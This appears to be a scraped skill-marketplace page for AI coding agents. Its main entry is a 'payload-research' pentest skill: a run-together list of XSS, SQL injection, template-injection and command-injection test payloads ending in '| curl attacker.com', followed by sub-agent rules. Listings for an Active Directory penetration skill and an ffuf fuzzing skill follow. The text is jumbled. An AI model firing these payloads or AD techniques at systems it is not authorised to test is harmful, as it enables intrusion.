一键导入
payload-research
Payload crafting and bypass research for vulnerability verification
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
菜单
Payload crafting and bypass research for vulnerability verification
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
基于 SOC 职业分类
| name | payload-research |
| description | Payload crafting and bypass research for vulnerability verification |
| tags | ["pentest","payload","research"] |
Use this skill when you need to research, craft, or refine payloads for vulnerability verification.
<script>alert(1)</script><img onerror=alert(1) src=x><svg onload=alert(1)>{{constructor.constructor('alert(1)')()}}' OR '1'='1, 1; SELECT 1--' UNION SELECT null,null--'; WAITFOR DELAY '0:0:5'--{{7*7}}, ${7*7}, <%= 7*7 %>{{config.__class__.__init__.__globals__['os'].popen('id').read()}}; id, | id, `id`; sleep 5, | curl attacker.comsubmit_sub_agent_output exactly once.candidate_findings.status as candidate (no final vulnerability verdicts here).hypothesis_id is provided, all submitted hypotheses/findings must remain on that single hypothesis.goal_achieved=true, default action is stop and hand off to document/report unless deep-dive is explicitly requested.This skill should be used when working with Bun runtime, bun:sqlite, Bun.serve, bun:test, or when "Bun", "bun:test", or Bun-specific patterns are mentioned.
pi-mono agent framework reference (github.com/badlogic/pi-mono). TRIGGER when: writing agent code using pi-ai/pi-agent-core/pi-coding-agent packages, defining tools with TypeBox schemas, implementing TUI or Web UI over an agent core, building extensions that hook into agent lifecycle, working with session/compaction/retry logic, implementing LLM provider abstractions, or any code that imports from @mariozechner/* packages.
UI/UX design intelligence. 50 styles, 21 palettes, 50 font pairings, 20 charts, 8 stacks (React, Next.js, Vue, Svelte, SwiftUI, React Native, Flutter, Tailwind). Actions: plan, build, create, design, implement, review, fix, improve, optimize, enhance, refactor, check UI/UX code. Projects: website, landing page, dashboard, admin panel, e-commerce, SaaS, portfolio, blog, mobile app, .html, .tsx, .vue, .svelte. Elements: button, modal, navbar, sidebar, card, table, form, chart. Styles: glassmorphism, claymorphism, minimalism, brutalism, neumorphism, bento grid, dark mode, responsive, skeuomorphism, flat design. Topics: color palette, accessibility, animation, layout, typography, font pairing, spacing, hover, shadow, gradient.
Active Directory 域渗透全链路指导技能。基于 GOAD (Game of Active Directory) 靶场实战经验, 涵盖从初始侦察、用户枚举、密码攻击、中继与投毒、ADCS证书攻击、MSSQL利用、提权、 横向移动、凭据提取、ACL滥用、委派攻击、域信任利用到域控拿下的完整渗透链。 当用户提到以下任何关键词时,务必触发此技能: AD渗透、域渗透、Active Directory、域控攻击、内网渗透、kerberoasting、AS-REP roasting、 NTLM relay、responder、bloodhound、certipy、ADCS、ESC1-ESC15、PetitPotam、 noPac、PrintNightmare、横向移动、pass the hash、golden ticket、silver ticket、 DCSync、secretsdump、mimikatz、委派攻击、delegation、ACL滥用、域信任、 forest trust、提权、SeImpersonate、KrbRelay、MSSQL提权、webshell、 凭据收集、密码喷洒、password spray、域枚举、SMB签名、coercer、 shadow credentials、certifried、RBCD、GPO abuse、LAPS、 即使用户没有明确说"域渗透",只要涉及Windows域环境的攻击场景都应使用此技能。
Browser automation CLI for AI agents. Use when the user needs to interact with websites, including navigating pages, filling forms, clicking buttons, taking screenshots, extracting data, testing web apps, or automating any browser task. Triggers include requests to "open a website", "fill out a form", "click a button", "take a screenshot", "scrape data from a page", "test this web app", "login to a site", "automate browser actions", or any task requiring programmatic web interaction.
Help with ffuf-based Web parameter fuzzing. Use this skill whenever the user wants to fuzz Web request paths, query parameters, headers, POST bodies, JSON fields, or raw HTTP requests with ffuf, or when they ask for an ffuf command, wordlist choice, false-positive filtering, matcher/filter tuning, or replaying hits into Burp/ZAP.